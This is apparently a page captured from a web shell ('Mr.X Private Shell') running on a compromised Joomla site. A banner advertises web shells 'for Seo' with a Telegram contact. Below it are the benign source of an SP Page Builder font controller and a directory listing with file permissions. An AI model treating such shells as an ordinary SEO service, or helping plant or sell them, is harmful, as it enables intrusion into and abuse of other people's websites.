__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2025 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// No direct access
defined('_JEXEC') or die('Restricted access');
use Joomla\CMS\Factory;
use Joomla\CMS\MVC\Controller\FormController;
use Joomla\CMS\Response\JsonResponse;
/**
* Fonts Controller class
*
* @since 5.0.0
*/
class SppagebuilderControllerFont extends FormController
{
/**
* Get installed fonts.
*
* @return array The fonts array.
* @since 5.0.0
*/
public function getInstalledFonts()
{
$db = Factory::getDbo();
$query = $db->getQuery(true);
$query->select('*')
->from($db->quoteName('#__sppagebuilder_fonts'))
->where($db->quoteName('published') . ' = 1');
$db->setQuery($query);
try {
$response = $db->loadObjectList();
if (isset($response)) {
foreach ($response as $key => $value) {
if (isset($value->data)) {
$value->data = json_decode($value->data);
}
}
}
} catch (\Exception $e) {
$response = [];
}
$this->sendResponse($response);
}
/**
* Send JSON Response to the client.
*
* @param array $response The response array or data.
* @param int $statusCode The status code of the HTTP response.
*
* @return void
* @since 5.0.0
*/
private function sendResponse($response, int $statusCode = 200): void
{
$app = Factory::getApplication();
$app->setHeader('status', $statusCode, true);
$app->sendHeaders();
echo new JsonResponse($response);
$app->close();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ai_content.php | File | 18.63 KB | 0664 |
|
| asset.php | File | 16.27 KB | 0664 |
|
| color.php | File | 3.82 KB | 0664 |
|
| dynamic_content.php | File | 9.35 KB | 0664 |
|
| font.php | File | 1.83 KB | 0664 |
|
| image_shapes.php | File | 2.74 KB | 0664 |
|
| media.php | File | 28.59 KB | 0664 |
|
| page.php | File | 28.48 KB | 0664 |
|
| saved_items_order.php | File | 2.03 KB | 0664 |
|
| typography.php | File | 2.28 KB | 0664 |
|